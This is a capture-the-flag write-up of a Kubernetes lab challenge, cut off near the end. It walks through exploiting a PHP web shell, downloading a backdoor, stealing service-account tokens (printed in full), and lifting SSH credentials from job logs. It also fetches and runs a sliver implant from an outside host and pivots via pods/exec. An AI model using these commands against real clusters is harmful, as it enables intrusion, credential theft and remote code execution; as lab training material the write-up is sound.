We are given the following information to start this kubernetes challenge:
Point your /etc/hosts for hello-world.tld to REDACTED_IP.
After you've done this "https://hello-world.tld/" will be your starting point.
Try to get full access to the master node and if you've found
the flag at the end of the challenge (look for /root/flag.txt),
please submit it at https://k8s-challenge.redguard.ch/flag?email=redacted@example.com
When visiting the website, we are greeted by the following page:
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Welcome!</title>
<!-- [...] -->
</head>
<body>
<div class="frameT">
<div class="frameTC">
<div class="content">
<h2>Welcome to</h2>
<h2 class="heavy">disenchant-vulnerable-app-demo-on-public-docker-hub-567654hbkfr</h2>
</div>
</div>
</div>
</body>
</html>
Given the very prominent message within the text, we can find the docker image that is deployed
to run the website we visited: https://hub.docker.com/r/disenchant/vulnerable-app-demo
.
To look at whats running inside, lets pull the image and exec into a new container:
docker pull disenchant/vulnerable-app-demo:latest
docker run --rm -it disenchant/vulnerable-app-demo:latest bash
Listing the files in the current directory, we can find index.php
:
root@f4c1393dbb1c:/var/www/html# ls -lah
total 136K
drwxrwxrwx 1 www-data www-data 4.0K Sep 13 2021 .
drwxr-xr-x 1 root root 4.0K Dec 11 2020 ..
-rw-r--r-- 1 root root 121K Sep 13 2021 background.png
-rw-r--r-- 1 root root 1.8K Sep 13 2021 index.php
Looking at the code, we can find this neat snipped of code that runs the
content of the user controlled shell
GET parameter as a system command:
<?php
if ($_GET['shell']) {
echo "<pre>";
system($_GET['shell']);
echo "</pre>";
}
?>
To test if the shell works, we issue the following curl command:
curl -k https://hello-world.tld/?shell=whoami
It works! The page returns with the additional content: www-data
.
Using the env
command, we list out the environment variables of the
currently running container:
curl -k https://hello-world.tld/?shell=env
We can see the variables of the container mixed together with kubernetes-specific variables
like the cluster ip address of the kubernetes api server: 10.96.0.1
KUBERNETES_SERVICE_PORT=443
PHP_EXTRA_CONFIGURE_ARGS=--with-apxs2 --disable-cgi
KUBERNETES_PORT=tcp://10.96.0.1:443
APACHE_CONFDIR=/etc/apache2
HOSTNAME=disenchant-vulnerable-app-demo-on-public-docker-hub-567654hbkfr
PHP_INI_DIR=/usr/local/etc/php
SHLVL=0
PHP_EXTRA_BUILD_DEPS=apache2-dev
PHP_LDFLAGS=-Wl,-O1 -pie
APACHE_RUN_DIR=/var/run/apache2
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
PHP_VERSION=7.2.34
APACHE_PID_FILE=/var/run/apache2/apache2.pid
GPG_KEYS=1729F83938DA44E27BA0F4D3DBDB397470D12172 B1B44D8F021E4E2D6021E995DC9FF8D3EE5AF27F
PHP_ASC_URL=https://www.php.net/distributions/php-7.2.34.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
PHP_URL=https://www.php.net/distributions/php-7.2.34.tar.xz
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
KUBERNETES_PORT_443_TCP_PORT=443
APACHE_LOCK_DIR=/var/lock/apache2
KUBERNETES_PORT_443_TCP_PROTO=tcp
LANG=C
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
PWD=/var/www/html
PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
KUBERNETES_SERVICE_HOST=10.96.0.1
PHP_SHA256=409e11bc6a2c18707dfc44bc61c820ddfd81e17481470f3405ee7822d8379903
APACHE_ENVVARS=/etc/apache2/envvars
Knowing that we can now run arbitrary commands, lets download a php backdoor that enables us to browse the file system a bit more comfortably:
curl -k https://hello-world.tld/?shell=curl%20-O%20https://gitlab.com/kalilinux/packages/webshells/-/raw/kali/master/php/php-backdoor.php
Navigating to https://hello-world.tld/php-backdoor.php?d=/var/run/secrets/kubernetes.io/serviceaccount/
allows us to access the token
of the service account that is currently assigned to the running pod:
eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjE4Mzg1LCJpYXQiOjE3MTc2ODIzODUsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiOTBlMDQ2MDQtNDMxOS00ZmM3LWExODMtZWJkMTI1YmRlY2YyIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6ImRpc2VuY2hhbnQtdnVsbmVyYWJsZS1hcHAtZGVtby1vbi1wdWJsaWMtZG9ja2VyLWh1Yi01Njc2NTRoYmtmciIsInVpZCI6IjdiMzgzY2E5LWE3OGMtNDJjMS04OWQ0LWI0N2I1NWJhMWI0ZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoicmVzdHJpY3RlZC12aWV3ZXIiLCJ1aWQiOiJkZTJjYjBlMy1mMTQyLTQzNzctYjY1ZC05NDZlMWRmYWMxNmYifSwid2FybmFmdGVyIjoxNzE3Njg1OTkyfSwibmJmIjoxNzE3NjgyMzg1LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YXBwbGljYXRpb25zOnJlc3RyaWN0ZWQtdmlld2VyIn0.Kq83s1lTYxWfJVMDxOuAQr5l5Ca5SSjSTaNuuOuk-SVolizCa38ud_HuvsaB_s36iNm31rcY8LFYqSdX8G5nZBIPhMyVBaAJchI4JVeG0Z8C4Xhhefcg9FtDrIFHgE6MnzWSnCCHw60boH8Sof65kx0R1IUPDSS3qOif4jon2caEYvFsGeDeCtOtnWdv-XqkKPF0APs-KA1yGad1yK9MOzidvJzog3v4D6pwpdD1jgKbu9TDXZu5s_hNfb9-ZmTjV7cxfaJvwLR1Ux0biwIKe3uG30Bd2lrBMpUteiQNtgQSkBEX17-TPOgtal8Xg8-QCZ-L8IRRaEVdiJXdkgmuWw
Decoding this JWT gives us some additional information about the service account and the cluster, for
example that we are currently running as restricted-viewer
in the applications
namespace on node hack-me-m02
:
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1749218385,
"iat": 1717682385,
"iss": "https://kubernetes.default.svc.cluster.local",
"jti": "90e04604-4319-4fc7-a183-ebd125bdecf2",
"kubernetes.io": {
"namespace": "applications",
"node": {
"name": "hack-me-m02",
"uid": "4af212ee-5403-4189-be7b-a95a416d3147"
},
"pod": {
"name": "disenchant-vulnerable-app-demo-on-public-docker-hub-567654hbkfr",
"uid": "7b383ca9-a78c-42c1-89d4-b47b55ba1b4f"
},
"serviceaccount": {
"name": "restricted-viewer",
"uid": "de2cb0e3-f142-4377-b65d-946e1dfac16f"
},
"warnafter": 1717685992
},
"nbf": 1717682385,
"sub": "system:serviceaccount:applications:restricted-viewer"
}
Having access to the service account token is only useful if we can also access the kubernetes api endpoint. For this, we have two ways:
Lets first scan the host to determine if we can find a kubernetes api endpoint using nmap
:
sudo nmap -sV hello-world.tld -p-
We can see a few interesting services running on random high ports, indicating that some services in the
cluster are exposed as a service of type NodePort
:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-06-06 18:05 CEST
Nmap scan report for hello-world.tld (194.182.190.241)
Host is up (0.0081s latency).
Not shown: 65449 closed ports, 78 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp
80/tcp open http nginx (reverse proxy)
443/tcp open ssl/http nginx (reverse proxy)
32769/tcp open ssl/filenet-rpc?
32771/tcp open ssl/sometimes-rpc5?
32772/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
32776/tcp open ssl/sometimes-rpc15?
32777/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
The most interesting port for us is 32769
, as running curl -k https://hello-world.tld:32769
gives us the following kubernetes api specific error message:
{
"kind": "Status",
"apiVersion": "v1",
"metadata": {},
"status": "Failure",
"message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
"reason": "Forbidden",
"details": {},
"code": 403
}
To connect to the newly found kubernetes api endpoint using our token, we construct a kubeconfig
file:
apiVersion: v1
clusters:
- cluster:
server: https://hello-world.tld:32769
insecure-skip-tls-verify: true
name: redguard
contexts:
- context:
cluster: redguard
user: restricted-viewer
name: restricted-viewer
current-context: restricted-viewer
kind: Config
preferences: {}
users:
- name: restricted-viewer
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjE4Mzg1LCJpYXQiOjE3MTc2ODIzODUsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiOTBlMDQ2MDQtNDMxOS00ZmM3LWExODMtZWJkMTI1YmRlY2YyIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6ImRpc2VuY2hhbnQtdnVsbmVyYWJsZS1hcHAtZGVtby1vbi1wdWJsaWMtZG9ja2VyLWh1Yi01Njc2NTRoYmtmciIsInVpZCI6IjdiMzgzY2E5LWE3OGMtNDJjMS04OWQ0LWI0N2I1NWJhMWI0ZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoicmVzdHJpY3RlZC12aWV3ZXIiLCJ1aWQiOiJkZTJjYjBlMy1mMTQyLTQzNzctYjY1ZC05NDZlMWRmYWMxNmYifSwid2FybmFmdGVyIjoxNzE3Njg1OTkyfSwibmJmIjoxNzE3NjgyMzg1LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YXBwbGljYXRpb25zOnJlc3RyaWN0ZWQtdmlld2VyIn0.Kq83s1lTYxWfJVMDxOuAQr5l5Ca5SSjSTaNuuOuk-SVolizCa38ud_HuvsaB_s36iNm31rcY8LFYqSdX8G5nZBIPhMyVBaAJchI4JVeG0Z8C4Xhhefcg9FtDrIFHgE6MnzWSnCCHw60boH8Sof65kx0R1IUPDSS3qOif4jon2caEYvFsGeDeCtOtnWdv-XqkKPF0APs-KA1yGad1yK9MOzidvJzog3v4D6pwpdD1jgKbu9TDXZu5s_hNfb9-ZmTjV7cxfaJvwLR1Ux0biwIKe3uG30Bd2lrBMpUteiQNtgQSkBEX17-TPOgtal8Xg8-QCZ-L8IRRaEVdiJXdkgmuWw
Using the above kubeconfig
, we can successfully connect to the cluster and start listing resources:
kubectl get all -o yaml
Looking at the result for pod the-princess-is-in-another-namespace
, we can see that it is running with the service account named pod-creator
:
apiVersion: v1
items:
- apiVersion: v1
kind: Pod
metadata:
# ...
name: the-princess-is-in-another-namespace
namespace: default
# ...
spec:
containers:
- image: nginx
imagePullPolicy: Always
name: nginx-container
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-hrb5k
readOnly: true
dnsPolicy: ClusterFirst
enableServiceLinks: true
nodeName: hack-me-m02
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
serviceAccount: pod-creator
serviceAccountName: pod-creator
terminationGracePeriodSeconds: 30
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
# ...
status:
# ...
kind: List
metadata:
resourceVersion: ""
However, as the name of the pod suggests, we can’t really do anything with the pod at the moment:
kubectl auth can-i --list
We don’t have a lot of permissions:
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
namespaces [] [] [list]
nodes [] [] [list]
pods [] [] [list]
Manually looking around the namespaces, we stumble accross some pods in the jobs
namespace:
kubectl get pods -n jobs
They look interesting:
NAME READY STATUS RESTARTS AGE
hello-28628552-smt56 0/1 Completed 0 2m51s
hello-28628553-k8tmn 0/1 Completed 0 111s
hello-28628554-tdwvp 0/1 Completed 0 51s
Lets look at the logs of the pod:
kubectl logs -n jobs hello-28628554-tdwvp
We can find ssh
credentials here!
Thu Jun 6 22:34:01 UTC 2024
My environment variables:
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_SERVICE_PORT=443
HOSTNAME=hello-28628554-tdwvp
SHLVL=1
HOME=/root
SSH_PASSWORD_ACCESS=true
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_PROTO=tcp
SSH_PASSWORD=s3cr3t-area41
SSH_HOST=openssh-server-service.applications.svc.cluster.local
SSH_USER=test-user
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_SERVICE_HOST=10.96.0.1
PWD=/
SSH_PORT=2222
StrictHostKeyChecking=no
Hoping to be able to find the service openssh-server-service.applications.svc.cluster.local
exposed as a NodePort
like the kubernetes api, we try to connect to the two ports that nmap
detected as running OpenSSH 8.9p1
before:
ssh test-user@hello-world.tld -p 32772 # Password: s3cr3t-area41
ssh test-user@hello-world.tld -p 32777 # Password: s3cr3t-area41
Sadly, both attempts fail.
So, we really only have the option to tunnel our commands through the web application…
To do this, we can use sliver. After setting up a server, generating an implant and
running the implant on the web application pod, we can task it to connect to the ssh server. Using the
credentials found above, we can then also download, modify and execute the implant on the ssh service
using sliver’s builtin ssh
command:
ssh -l test-user -P s3cr3t-area41 -p 2222 openssh-server-service.applications.svc.cluster.local wget http://redacted:8080/RIPE_ZOOT-SUIT
ssh -l test-user -P s3cr3t-area41 -p 2222 openssh-server-service.applications.svc.cluster.local chmod +x RIPE_ZOOT-SUIT
ssh -l test-user -P s3cr3t-area41 -p 2222 openssh-server-service.applications.svc.cluster.local ./RIPE_ZOOT-SUIT
Immediately, we get a callback from the ssh service pod. Lets see if its running as a different service account:
cat /var/run/secrets/kubernetes.io/serviceaccount/token
We get a new token:
eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjI3MTM3LCJpYXQiOjE3MTc2OTExMzcsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiYTNjOGNlNzYtZGJiMi00ODNlLWIyYWQtYTk2MDE1YmMyNzI2Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6Im9wZW5zc2gtc2VydmVyLTZkNGI4NWY5NzkteGhubXQiLCJ1aWQiOiI0OWNhZDk0ZC1mMDBkLTQxMmUtODNlMi1jMWEyY2JmNmNiZmUifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6InBvZC1leGVjdXRlciIsInVpZCI6IjFiYzVhNTk0LWI1ZWEtNDI2My1hZDQzLWU2NDg5N2RkZTEzMSJ9LCJ3YXJuYWZ0ZXIiOjE3MTc2OTQ3NDR9LCJuYmYiOjE3MTc2OTExMzcsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDphcHBsaWNhdGlvbnM6cG9kLWV4ZWN1dGVyIn0.KCJXe0l8NpouCpCsKIIzkGYL1kZKtqbOrkTu4BBfHR2c94pgIBBD3TzwylOhMDZLw1acMWGZmAlpsNFUIxIh_EapbarXyIEisAPnyqZlyuGnPQbOBCpMvyXom8RmVOpF2fqqPyHrPaHb_DpIBAnbU03nVh9CzqXeYM84stuh6juP1W5BE1xL7ggQeZOvlZTMExcHkzpNmBtC9h7RAXU9-U-rGNnXNiw9HSdOBE1hk-fJVeKH8qZzdgr62D-HJYir1wk7685PJ9w38CLi2nAKdyDhV3MNyNH2XaZKn8MFXM-bAFqfXxwQ3MFQe8uB41JAD3Gj4zCrrUN5Nm0BsF1CUQ
Looking at the JWT, we find that we are now running as the service account pod-executer
,
a service account that we have not seen before.
{
"aud": [
"https://kubernetes.default.svc.cluster.local"
],
"exp": 1749227137,
"iat": 1717691137,
"iss": "https://kubernetes.default.svc.cluster.local",
"jti": "a3c8ce76-dbb2-483e-b2ad-a96015bc2726",
"kubernetes.io": {
"namespace": "applications",
"node": {
"name": "hack-me-m02",
"uid": "4af212ee-5403-4189-be7b-a95a416d3147"
},
"pod": {
"name": "openssh-server-6d4b85f979-xhnmt",
"uid": "49cad94d-f00d-412e-83e2-c1a2cbf6cbfe"
},
"serviceaccount": {
"name": "pod-executer",
"uid": "1bc5a594-b5ea-4263-ad43-e64897dde131"
},
"warnafter": 1717694744
},
"nbf": 1717691137,
"sub": "system:serviceaccount:applications:pod-executer"
}
Let’s add the new service account to our kubeconfig
:
apiVersion: v1
clusters:
- cluster:
server: https://hello-world.tld:32769
insecure-skip-tls-verify: true
name: redguard
contexts:
- context:
cluster: redguard
user: restricted-viewer
name: restricted-viewer
- context:
cluster: redguard
user: pod-executer
name: pod-executer
current-context: pod-executer
kind: Config
preferences: {}
users:
- name: restricted-viewer
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjE4Mzg1LCJpYXQiOjE3MTc2ODIzODUsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiOTBlMDQ2MDQtNDMxOS00ZmM3LWExODMtZWJkMTI1YmRlY2YyIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6ImRpc2VuY2hhbnQtdnVsbmVyYWJsZS1hcHAtZGVtby1vbi1wdWJsaWMtZG9ja2VyLWh1Yi01Njc2NTRoYmtmciIsInVpZCI6IjdiMzgzY2E5LWE3OGMtNDJjMS04OWQ0LWI0N2I1NWJhMWI0ZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoicmVzdHJpY3RlZC12aWV3ZXIiLCJ1aWQiOiJkZTJjYjBlMy1mMTQyLTQzNzctYjY1ZC05NDZlMWRmYWMxNmYifSwid2FybmFmdGVyIjoxNzE3Njg1OTkyfSwibmJmIjoxNzE3NjgyMzg1LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YXBwbGljYXRpb25zOnJlc3RyaWN0ZWQtdmlld2VyIn0.Kq83s1lTYxWfJVMDxOuAQr5l5Ca5SSjSTaNuuOuk-SVolizCa38ud_HuvsaB_s36iNm31rcY8LFYqSdX8G5nZBIPhMyVBaAJchI4JVeG0Z8C4Xhhefcg9FtDrIFHgE6MnzWSnCCHw60boH8Sof65kx0R1IUPDSS3qOif4jon2caEYvFsGeDeCtOtnWdv-XqkKPF0APs-KA1yGad1yK9MOzidvJzog3v4D6pwpdD1jgKbu9TDXZu5s_hNfb9-ZmTjV7cxfaJvwLR1Ux0biwIKe3uG30Bd2lrBMpUteiQNtgQSkBEX17-TPOgtal8Xg8-QCZ-L8IRRaEVdiJXdkgmuWw
- name: pod-executer
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjI3MTM3LCJpYXQiOjE3MTc2OTExMzcsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiYTNjOGNlNzYtZGJiMi00ODNlLWIyYWQtYTk2MDE1YmMyNzI2Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6Im9wZW5zc2gtc2VydmVyLTZkNGI4NWY5NzkteGhubXQiLCJ1aWQiOiI0OWNhZDk0ZC1mMDBkLTQxMmUtODNlMi1jMWEyY2JmNmNiZmUifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6InBvZC1leGVjdXRlciIsInVpZCI6IjFiYzVhNTk0LWI1ZWEtNDI2My1hZDQzLWU2NDg5N2RkZTEzMSJ9LCJ3YXJuYWZ0ZXIiOjE3MTc2OTQ3NDR9LCJuYmYiOjE3MTc2OTExMzcsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDphcHBsaWNhdGlvbnM6cG9kLWV4ZWN1dGVyIn0.KCJXe0l8NpouCpCsKIIzkGYL1kZKtqbOrkTu4BBfHR2c94pgIBBD3TzwylOhMDZLw1acMWGZmAlpsNFUIxIh_EapbarXyIEisAPnyqZlyuGnPQbOBCpMvyXom8RmVOpF2fqqPyHrPaHb_DpIBAnbU03nVh9CzqXeYM84stuh6juP1W5BE1xL7ggQeZOvlZTMExcHkzpNmBtC9h7RAXU9-U-rGNnXNiw9HSdOBE1hk-fJVeKH8qZzdgr62D-HJYir1wk7685PJ9w38CLi2nAKdyDhV3MNyNH2XaZKn8MFXM-bAFqfXxwQ3MFQe8uB41JAD3Gj4zCrrUN5Nm0BsF1CUQ
Let’s look at what new permissions we have:
kubectl auth can-i --list
As the name of the service account suggests, we can now use pods/exec
:
Resources Non-Resource URLs Resource Names Verbs
pods/exec [] [] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods/log [] [] [get list]
pods [] [] [get list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Using this new permission, we can exec into the pod the-princess-is-in-another-namespace
:
kubectl exec -it -n default the-princess-is-in-another-namespace -- bash
As before, we collect the service account token, that we know belongs to the pod-creator
user:
eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjI3MjE2LCJpYXQiOjE3MTc2OTEyMTYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiY2YzMDNkNjEtZDI1Yy00ZGRkLTlkMzMtNWNhNWM0MzBhZWUxIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwibm9kZSI6eyJuYW1lIjoiaGFjay1tZS1tMDIiLCJ1aWQiOiI0YWYyMTJlZS01NDAzLTQxODktYmU3Yi1hOTVhNDE2ZDMxNDcifSwicG9kIjp7Im5hbWUiOiJ0aGUtcHJpbmNlc3MtaXMtaW4tYW5vdGhlci1uYW1lc3BhY2UiLCJ1aWQiOiIyZGVkM2Q2Zi0xMjBhLTQ2ZmEtODYxMS1mZjYyOWZmNTdlMjIifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6InBvZC1jcmVhdG9yIiwidWlkIjoiZmI4ZWU2NTUtYzIwMS00ZTUxLTk0YjAtMjE5MDdiZGIyOWI4In0sIndhcm5hZnRlciI6MTcxNzY5NDgyM30sIm5iZiI6MTcxNzY5MTIxNiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6cG9kLWNyZWF0b3IifQ.eocZ2wPoF64CbkXIW7TRQIRpsUwP0QMfQLMixuJJDPPuq62b1JWZrmIEIZM8_di1HES1xmeuS7xCc6YaOSK-SQ94APP5cb_CUzYzzQGjn4PyVmMPSzYVYUZJI3oj2hEb4-6V8LdfnaOg8QO79uU5NdAmMDENiR3Qt-Atz4YOpWM3cngfFqiPwIGXKxHB5tjqK87CcpK2XSc8g-cm4Fe5y9XF-ZEQSZY-CmS1MSURptFVkTFXZG5M5Gru7ORWvIJ-HMDewgG96vcgE6llLmACH5W-zzgEMEpFR-EW5VYjmwbX_70oZRs1Br6ggvJMrd0_mG6mtM_IsGFlNeN544WmSQ
Once again, we extend our kubeconfig
to add the new service account token:
apiVersion: v1
clusters:
- cluster:
server: https://hello-world.tld:32769
insecure-skip-tls-verify: true
name: redguard
contexts:
- context:
cluster: redguard
user: restricted-viewer
name: restricted-viewer
- context:
cluster: redguard
user: pod-executer
name: pod-executer
- context:
cluster: redguard
user: pod-creator
name: pod-creator
current-context: pod-creator
kind: Config
preferences: {}
users:
- name: restricted-viewer
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjE4Mzg1LCJpYXQiOjE3MTc2ODIzODUsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiOTBlMDQ2MDQtNDMxOS00ZmM3LWExODMtZWJkMTI1YmRlY2YyIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6ImRpc2VuY2hhbnQtdnVsbmVyYWJsZS1hcHAtZGVtby1vbi1wdWJsaWMtZG9ja2VyLWh1Yi01Njc2NTRoYmtmciIsInVpZCI6IjdiMzgzY2E5LWE3OGMtNDJjMS04OWQ0LWI0N2I1NWJhMWI0ZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoicmVzdHJpY3RlZC12aWV3ZXIiLCJ1aWQiOiJkZTJjYjBlMy1mMTQyLTQzNzctYjY1ZC05NDZlMWRmYWMxNmYifSwid2FybmFmdGVyIjoxNzE3Njg1OTkyfSwibmJmIjoxNzE3NjgyMzg1LC